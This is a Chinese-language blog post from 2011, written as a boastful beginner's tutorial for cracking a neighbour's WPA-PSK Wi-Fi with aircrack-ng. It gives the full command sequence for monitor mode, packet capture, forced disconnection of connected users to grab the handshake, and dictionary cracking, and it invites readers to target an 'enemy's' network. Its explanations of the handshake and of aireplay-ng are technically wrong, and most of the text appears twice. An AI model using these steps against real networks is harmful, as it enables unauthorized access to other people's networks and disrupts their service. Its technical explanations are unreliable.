Monday, 7 November 2011
小白的技术帖01---破解WPA网络强大教程
哈哈哈哈哈哈,我终于破解了对面家的无线网络,还是WPA的勒~~
好了,小白的第1个技术帖就写这个,无线WPA加密式网络破解,哈哈哈,题目不错
WPA加密的网络基本上都能在aircrack-ng的官方网站文档找得到~但是依笨人的看法,那不够好(笨人说得好是简单,快速,有效)。笨人看到的官网破解WPA的步骤要卸载某个驱动,然后在启动什么傻不拉唧的垃圾东西才能得到的(笨人也10分的反感)
经过笨人的精心寻找资料后,我终于发现到跟有效的方法(掌声呢?????),在此我要发布笨人的拙见给大家。
不多说,看图
哪!那个在中间的凸状汉堡包类似体就是我们的路由器(router)啦!他的功用就是将数据包通过一个个网络传送至目的地。他能在网络之间传递分组,也能为数据加密。现在普遍的网络分包加密算法有WEP和WPA(也有WPA2,暂且这归类为WPA)。WEP的不安全之处大家也知道吧?那个什么数据流阿,什么IV机率64位机器分包通通狗屁都不用说!
WPA(或者是WPA)都远远比WEP强的多,原因是在WPA的設計中要用到一個 802.1X 認證伺服器來散佈不同的鑰匙給各個用戶;不過它也可以用在較不保險的 "pre-shared key" (PSK) 模式,讓每個用戶都用同一個密語。这就足够可以解除了WEP的不良之处了,哈哈哈哈哈。而且,WPA 的資料是以一把 128 位元的鑰匙和一個 48 位元的初向量 (IV) 的 RC4 stream cipher 來加密。WPA 超越 WEP 的主要改进就是在使用中可以動態改變鑰匙的「臨時鑰匙完整性協定」(这翻译得很勉强。。。)
这意味着什么??这意味着我们不能傻乎乎的坐在角落用你那傻乎乎的中指按下几个键,发呆~~~截取满10000个包包后,就能冲浪了!!!
这。。。。很明显是个菜鸟问的问题~大鸟会静静地看完这篇文章才来问的。
破解WPA,在理论上只有一种。那就是撷取“握手包”!
我们网络用户在与路由器建立一个session(这就是在OSI第3层,这在详细要问网络结构专家,我?我很忙的。。。)。在session的同时我们的路由器会发送ACK和SYN数据包。SYN我们可以忽略,因为他没有包含臨時鑰匙。我们来看ACK吧,他在这里可以被说成是握手包。我们用户在与路由器连接时(也就是认证密码的时候),用户会发送“侦探注入点”封包,而。路由器会发送“握手包”!!!!!!
这意味着什么??这意味着我们能不停的让用户与路由器互相发送,并交换封包的当儿。我们就迅雷不及掩耳地撷取握手包啊啊啊啊啊啊啊啊!!!!!
我可以从电脑淫幕前看到你们各位的表情充满了不屑,呵呵呵呵
我只能跟你们讲,欢乐时间开始了~~
本文假设你们都是用bt 4 或以上(还有那BT6,噢呵呵呵呵,我忍不住了。想知详情看:http://bit.ly/vKsMtz)
还有,我们只能破解PSK式的WPA加密。
你如果不想空欢心的话,就试下打这个:
aireplay-ng -9 -e <某个网络的名字> -i wlan0
如果那网络显示注入不能的话,那就是你的网卡不支持这么激烈的运动了(驱动问题)
国际惯例:
打开你的终端~~~~~~~
大力的打下那a键吧!!!你吃饱饭没??
airmon-ng
选择你的网卡吧!!笨人用的是wlan0(打比方,打比方。。。。。。)这可以将你的网卡强大起来!!
监。控。模。式!怎样?很酷吧?
airmon-ng start wlan0
选择你的仇人的网络,呃呃俄你不要选到WEP哦??无论你是不是故意的。。。总之,你最好确认下。
airodump-ng mon0
Ctrl+C,取消行程。然后打:
airodump-ng --channel <那网络的频道(在CH栏下的)> --bssid <网络的BSSID> --write <档案名> mon0
呵呵呵,如果没错的话。你就是在监控人家的网络了。
你已成功了一半哪~~我的天。现在,开多新的终端
打下:
aireplay-ng -1 1 -a <那网络的BSSID> -c <station(你懂哪个吗??我图上面有的啊啊!我图的底下有个“STATION”的那个栏,那是表明有多少个用户在线上阿)> mon0
以上的命令也许有人看不懂吧?让我来告诉你,上面的命令是命令aireplay-ng发送ARP数据包使对方的网络受到ARP污染,处于断网不能,接网不能的兴奋状态!温馨提醒:这时对方的网络会瘫痪,对方有可能发觉到不对劲哦~~~
如果能的话,就会有以下的讯息:
Waiting for beaconframe (BSSID: 00:11:22:33:44:55) on channel 8
Sending 64 directed DeAuth. STMAC: [55:44:33:22:11:00] [ X|Y ACKs]
其中,X等于你受到回复的ACK包包
Y 是你发出去的ACK包包
破解密码:
aircrack-ng 档案名-01.cap -w /pentest/passwords/wordlists/darkc0de.lst
加载字典,呵呵
我发送一次就受到够我破解的分包了(LUCKILY....)
发送一次还是不够破解密码的同学,你们也许需要
aireplay-ng -1 0 -a <那网络的BSSID> -c <station> mon0
连续发送ACK包。。。。。。。。。。
WINDOW 的朋友,你们在蛋疼这玩意吗??
我没说不行阿~你们一定找不到字典吧??我留下了bt内置的字典纳~~
可怜的你如果还是不行的话。。。。
就回帖说不行吧。我尽量帮你们~
如果成功破解到的话。。。。。
也回帖吧。我本来想隐藏的阿,帮忙顶顶吧~
好了,小白的第1个技术帖就写这个,无线WPA加密式网络破解,哈哈哈,题目不错
WPA加密的网络基本上都能在aircrack-ng的官方网站文档找得到~但是依笨人的看法,那不够好(笨人说得好是简单,快速,有效)。笨人看到的官网破解WPA的步骤要卸载某个驱动,然后在启动什么傻不拉唧的垃圾东西才能得到的(笨人也10分的反感)
经过笨人的精心寻找资料后,我终于发现到跟有效的方法(掌声呢?????),在此我要发布笨人的拙见给大家。
不多说,看图
哪!那个在中间的凸状汉堡包类似体就是我们的路由器(router)啦!他的功用就是将数据包通过一个个网络传送至目的地。他能在网络之间传递分组,也能为数据加密。现在普遍的网络分包加密算法有WEP和WPA(也有WPA2,暂且这归类为WPA)。WEP的不安全之处大家也知道吧?那个什么数据流阿,什么IV机率64位机器分包通通狗屁都不用说!
------WPA算法有什么好啊??------
WPA(或者是WPA)都远远比WEP强的多,原因是在WPA的設計中要用到一個 802.1X 認證伺服器來散佈不同的鑰匙給各個用戶;不過它也可以用在較不保險的 "pre-shared key" (PSK) 模式,讓每個用戶都用同一個密語。这就足够可以解除了WEP的不良之处了,哈哈哈哈哈。而且,WPA 的資料是以一把 128 位元的鑰匙和一個 48 位元的初向量 (IV) 的 RC4 stream cipher 來加密。WPA 超越 WEP 的主要改进就是在使用中可以動態改變鑰匙的「臨時鑰匙完整性協定」(这翻译得很勉强。。。)
这意味着什么??这意味着我们不能傻乎乎的坐在角落用你那傻乎乎的中指按下几个键,发呆~~~截取满10000个包包后,就能冲浪了!!!
------如何才能破解呢??------
这。。。。很明显是个菜鸟问的问题~大鸟会静静地看完这篇文章才来问的。
破解WPA,在理论上只有一种。那就是撷取“握手包”!
我们网络用户在与路由器建立一个session(这就是在OSI第3层,这在详细要问网络结构专家,我?我很忙的。。。)。在session的同时我们的路由器会发送ACK和SYN数据包。SYN我们可以忽略,因为他没有包含臨時鑰匙。我们来看ACK吧,他在这里可以被说成是握手包。我们用户在与路由器连接时(也就是认证密码的时候),用户会发送“侦探注入点”封包,而。路由器会发送“握手包”!!!!!!
这意味着什么??这意味着我们能不停的让用户与路由器互相发送,并交换封包的当儿。我们就迅雷不及掩耳地撷取握手包啊啊啊啊啊啊啊啊!!!!!
------高潮来了呜哇哇啊啊啊啊啊啊阿------
我可以从电脑淫幕前看到你们各位的表情充满了不屑,呵呵呵呵
我只能跟你们讲,欢乐时间开始了~~
本文假设你们都是用bt 4 或以上(还有那BT6,噢呵呵呵呵,我忍不住了。想知详情看:http://bit.ly/vKsMtz)
还有,我们只能破解PSK式的WPA加密。
你如果不想空欢心的话,就试下打这个:
aireplay-ng -9 -e <某个网络的名字> -i wlan0
如果那网络显示注入不能的话,那就是你的网卡不支持这么激烈的运动了(驱动问题)
国际惯例:
打开你的终端~~~~~~~
大力的打下那a键吧!!!你吃饱饭没??
airmon-ng
选择你的网卡吧!!笨人用的是wlan0(打比方,打比方。。。。。。)这可以将你的网卡强大起来!!
监。控。模。式!怎样?很酷吧?
airmon-ng start wlan0
选择你的仇人的网络,呃呃俄你不要选到WEP哦??无论你是不是故意的。。。总之,你最好确认下。
airodump-ng mon0
Ctrl+C,取消行程。然后打:
airodump-ng --channel <那网络的频道(在CH栏下的)> --bssid <网络的BSSID> --write <档案名> mon0
呵呵呵,如果没错的话。你就是在监控人家的网络了。
你已成功了一半哪~~我的天。现在,开多新的终端
打下:
aireplay-ng -1 1 -a <那网络的BSSID> -c <station(你懂哪个吗??我图上面有的啊啊!我图的底下有个“STATION”的那个栏,那是表明有多少个用户在线上阿)> mon0
以上的命令也许有人看不懂吧?让我来告诉你,上面的命令是命令aireplay-ng发送ARP数据包使对方的网络受到ARP污染,处于断网不能,接网不能的兴奋状态!温馨提醒:这时对方的网络会瘫痪,对方有可能发觉到不对劲哦~~~
如果能的话,就会有以下的讯息:
Waiting for beaconframe (BSSID: 00:11:22:33:44:55) on channel 8
Sending 64 directed DeAuth. STMAC: [55:44:33:22:11:00] [ X|Y ACKs]
其中,X等于你受到回复的ACK包包
Y 是你发出去的ACK包包
破解密码:
aircrack-ng 档案名-01.cap -w /pentest/passwords/wordlists/darkc0de.lst
加载字典,呵呵
我发送一次就受到够我破解的分包了(LUCKILY....)
发送一次还是不够破解密码的同学,你们也许需要
aireplay-ng -1 0 -a <那网络的BSSID> -c <station> mon0
连续发送ACK包。。。。。。。。。。
WINDOW 的朋友,你们在蛋疼这玩意吗??
我没说不行阿~你们一定找不到字典吧??我留下了bt内置的字典纳~~
就回帖说不行吧。我尽量帮你们~
如果成功破解到的话。。。。。
也回帖吧。我本来想隐藏的阿,帮忙顶顶吧~
Subscribe to:
Posts (Atom)